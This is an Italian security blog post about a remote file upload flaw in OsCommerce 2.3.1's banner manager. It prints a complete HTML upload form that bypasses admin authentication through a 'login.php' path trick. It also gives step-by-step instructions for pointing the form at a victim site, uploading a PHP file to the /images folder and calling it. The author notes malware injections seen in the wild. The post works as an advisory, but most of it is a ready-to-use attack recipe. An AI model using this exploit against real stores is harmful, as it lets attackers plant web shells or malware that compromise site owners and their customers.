Home » Sicurezza » [EXPLOIT] – OsCommerce 2.3.1 Remote File Upload Vulnerability

[EXPLOIT] – OsCommerce 2.3.1 Remote File Upload Vulnerability

Come ricordete l’ultima volta che venne nominato l’ecommerce OsCommerce su questo sito era per segnalare una grave vulnerabilità presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso.

A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: la 2.3.1 e la nuova 3.0.1. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.

Lo scorso 14 Maggio, però, è stata scoperta una nuova falla (purtoppo molto simile alla precedente) che permette l’upload di files nella cartella “/images” senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.

Come riportato qui il componente Banner (banner_manager.php) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che consente di uploadare files sul sito “vittima” semplicemente creando sul proprio PC una pagina html con il seguente codice:

<form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”><br />
<input type=”file” name=”banners_image”/><br />
<input name=”submit” value=” Save ” type=”submit”/></form>

Basterà sostituire a “site/path” il dominio e l’eventuale sottocartella del sito basato su questo Cms e salvare il file in formato “.html”.

Apritelo con il vostro Browser e vi troverete davanti un form di upload file.

Scegliete il vostro file e fate l’upload; una volta terminata l’operazione potrete interrogare il file richiamando l’url nel seguente modo:

http://site/path/images/<fileinviato.php>

Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di iniezione di virus/malware come già riscontrato sempre nel 2009.

Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.

 

Ti è stato utile? Votalo!
[Voti: 0    Media Voto: 0/5]
Altro... authentication bypass, exploit, hack oscommerce, oscommerce, osCommerce 2.3.1, proof of concept, remote file upload
Chiudi